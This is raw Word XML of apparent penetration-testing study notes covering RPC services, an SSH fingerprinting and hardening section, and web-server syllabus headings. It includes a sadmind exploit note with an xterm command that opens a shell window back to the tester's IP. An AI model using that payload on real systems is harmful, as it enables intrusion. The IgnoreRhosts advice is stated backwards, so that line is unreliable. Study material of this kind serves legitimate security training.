      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="149"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF23FF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>mountd</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF23FF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00AF23FF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Handles mount requests from client of the NFS service</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF23FF" w:rsidRPr="00AF23FF" w:rsidRDefault="00AF23FF" w:rsidP="00AF23FF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="149"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AF23FF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>nfs</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AF23FF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00AF23FF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00AF23FF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>Implements the user level part of the NFS service.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF23FF" w:rsidRPr="00AF23FF" w:rsidRDefault="00AF23FF" w:rsidP="00AF23FF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="149"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF23FF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>nfs_acl</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF23FF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00AF23FF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>Same as nfs but with support for access control lists</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF23FF" w:rsidRDefault="00AF23FF" w:rsidP="00AF23FF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="149"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AF23FF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>dmispd</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AF23FF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00AF23FF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Sun Solstice Enterprise DMI Service Provider. DMI = desktop management</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF23FF" w:rsidRPr="00AF23FF" w:rsidRDefault="00AF23FF" w:rsidP="00AF23FF">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="720"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AF23FF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>interface</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AF23FF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> = like snmp, uses MIF instead of MIB.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF23FF" w:rsidRDefault="00AF23FF" w:rsidP="00AF23FF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="149"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AF23FF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>snmpXdmid</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AF23FF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00AF23FF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Sun Solstice Enterprise SNMP-DMI mapper subagent. Changes snmp </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF23FF" w:rsidRPr="00AF23FF" w:rsidRDefault="00AF23FF" w:rsidP="00AF23FF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AF23FF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>request</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AF23FF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> to DMI requests (vice versa with responses).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF23FF" w:rsidRPr="00AF23FF" w:rsidRDefault="00AF23FF" w:rsidP="00AF23FF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="149"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AF23FF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>bootparam</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AF23FF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AF23FF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00AF23FF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>RPC based replacement for bootp.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF23FF" w:rsidRPr="00AF23FF" w:rsidRDefault="00AF23FF" w:rsidP="00AF23FF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="149"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AF23FF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ypbind</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AF23FF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AF23FF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>All systems in a NIS domain need to be running this service.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6D8E" w:rsidRPr="00AF23FF" w:rsidRDefault="00AF23FF" w:rsidP="00AF23FF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="149"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AF23FF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ypserv</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AF23FF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AF23FF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00AF23FF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>NIS servers (Master and Slave servers) should be running this service.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6D8E" w:rsidRDefault="009D6D8E" w:rsidP="009D6D8E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>F8b - Recent or commonly-found RPC service vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF23FF" w:rsidRDefault="00AF23FF" w:rsidP="00AF23FF"/>
    <w:p w:rsidR="00AF23FF" w:rsidRDefault="00AF23FF" w:rsidP="00AF23FF">
      <w:r>
        <w:t>Vulnerable = sadmind exploit in metaspoilt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF23FF" w:rsidRDefault="00AF23FF" w:rsidP="00AF23FF">
      <w:r>
        <w:t>“/usr/openwin/bin/xterm –display &lt;myip&gt;:0 &amp;”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6D8E" w:rsidRDefault="009D6D8E" w:rsidP="009D6D8E"/>
    <w:p w:rsidR="009D6D8E" w:rsidRDefault="0003487C" w:rsidP="009D6D8E">
      <w:r w:rsidRPr="0003487C">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>BLAH</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6D8E" w:rsidRDefault="009D6D8E" w:rsidP="009D6D8E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>F9 – SSH</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6D8E" w:rsidRDefault="009D6D8E" w:rsidP="009D6D8E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>F9a - Identify the types and versions of SSH software in use</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF23FF" w:rsidRPr="00AF23FF" w:rsidRDefault="00AF23FF" w:rsidP="00AF23FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF23FF">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Fingerprint SSH service:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF23FF" w:rsidRPr="00C21C9C"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lastRenderedPageBreak/>
        <w:t>telnet</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C21C9C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;ipaddress&gt; 22</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF23FF" w:rsidRPr="00C21C9C"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ncat</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C21C9C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;ipaddress&gt; 22</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6D8E"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w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C21C9C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;ipaddress&gt; 22</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005861E1" w:rsidRDefault="005861E1" w:rsidP="00AF23FF">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005861E1" w:rsidRDefault="005861E1" w:rsidP="00AF23FF">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ssh</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> -1 &lt;target&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005861E1" w:rsidRPr="00AF23FF" w:rsidRDefault="005861E1" w:rsidP="00AF23FF">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Protocol major versions differ: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>1 vs 2</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00816A83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00816A83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>(if 1 is disabled)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6D8E" w:rsidRDefault="009D6D8E" w:rsidP="009D6D8E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>F9b - Securing SSH</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA4468" w:rsidRPr="005861E1" w:rsidRDefault="00AA4468" w:rsidP="005861E1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="150"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005861E1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Protocol - The older protocol version 1 (one) has significant well-known vulnerabilities and available exploits, therefore it is not to be used. "2" (two) is a more recent version of the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005861E1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005861E1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> protocol and is more robust and safer to use. Whereas version 1 lacks a strong mechanism for ensuring the security of the communications connection.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF23FF" w:rsidRPr="005861E1" w:rsidRDefault="00AA4468" w:rsidP="005861E1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="150"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005861E1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PubkeyAuthentication - Public Key Authentication is stronger than password based. It is the recommended default. It requires the establishment and exchange of public and private key pairs.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA4468" w:rsidRPr="005861E1" w:rsidRDefault="00AA4468" w:rsidP="005861E1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="150"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005861E1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">PermitRootLogin - The secure answer for this is 'no'. By default, users should login to the system with their own non-privilege userID, and either </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005861E1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>utilize</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005861E1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> sudo or su to root to perform administrative functions. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA4468" w:rsidRPr="005861E1" w:rsidRDefault="00AA4468" w:rsidP="005861E1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="150"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005861E1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>IgnoreRhosts - Will be set to 'no' and thus denies usage of insecure authentication via .rhost files.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA4468" w:rsidRPr="005861E1" w:rsidRDefault="00AA4468" w:rsidP="005861E1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="150"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005861E1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PasswordAuthentication - Will be set to 'no', denying insecure usage of passwords from the /etc/passwd file for allowed users, thus leveraging an emphasis on public/private keys.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6D8E" w:rsidRPr="005861E1" w:rsidRDefault="00AA4468" w:rsidP="005861E1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="150"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005861E1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PermitEmptyPasswords -Will be set to 'no' to prevent userIDs with blank passwords on this system from being accessed remotely.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6D8E" w:rsidRDefault="009D6D8E" w:rsidP="005861E1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>F9c - Versions 1 and 2 of the SSH protocol</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE4DF8" w:rsidRPr="005861E1" w:rsidRDefault="00EE4DF8" w:rsidP="005861E1">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE4DF8">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Since SSH-1 has inherent design flaws which make it vulnerable (e.g., man-in-the-middle attacks), it is now generally considered obsolete and should be avoided by explicitly disabling fallback to SSH-1. In all versions of SSH, it is important to verify unknown public keys before accepting them as valid. Accepting an attacker's public key as a valid public key has the effect of disclosing the transmitted password and allowing man-in-the-middle attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6D8E" w:rsidRDefault="009D6D8E" w:rsidP="005861E1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>F9d - Authentication mechanisms within SSH</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005861E1" w:rsidRPr="00BF49BC" w:rsidRDefault="005861E1" w:rsidP="005861E1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF49BC">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Password - a method for straightforward password authentication, including a facility allowing a password to be changed. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005861E1" w:rsidRPr="00BF49BC" w:rsidRDefault="005861E1" w:rsidP="005861E1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF49BC">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Publickey - a method for public key-based authentication, usually supporting at least DSA or RSA keypairs. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005861E1" w:rsidRPr="00BF49BC" w:rsidRDefault="005861E1" w:rsidP="005861E1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF49BC">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Keyboard-interactive - a versatile method where the server sends one or more prompts to enter information and the client displays them and sends back responses keyed-in by the user. Used to provide one-time password authentication such as S/Key or SecurID. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005861E1" w:rsidRPr="00BF49BC" w:rsidRDefault="005861E1" w:rsidP="005861E1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF49BC">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>GSSAPI authentication - providing an extensible scheme to perform SSH authentication using external mechanisms such as Kerberos 5 or NTLM, providing single sign on capability to SSH sessions.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005861E1" w:rsidRDefault="005861E1">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0AF4" w:rsidRDefault="00434D06" w:rsidP="00434D06">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00434D06">
        <w:lastRenderedPageBreak/>
        <w:t>Web Technologies</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434D06" w:rsidRDefault="00434D06"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434D06" w:rsidRPr="005F25BF" w:rsidTr="000336A2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="572"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G1</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Server Operation</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How a web server functions in terms of the client/server architecture.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00434D06"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Concepts of virtual hosting and web proxies.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G2</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Servers &amp; their Flaws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web servers and their fundamental differences and vulnerabilities associated with them:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000336A2" w:rsidRPr="000336A2" w:rsidRDefault="000336A2" w:rsidP="000336A2">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="14"/>
              </w:numPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000336A2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>IIS</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00434D06" w:rsidRPr="000336A2" w:rsidRDefault="000336A2" w:rsidP="000336A2">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="14"/>
              </w:numPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000336A2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Apache (and variants)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G3</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w:t>
            </w:r>
            <w:r w:rsidR="00434D06">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
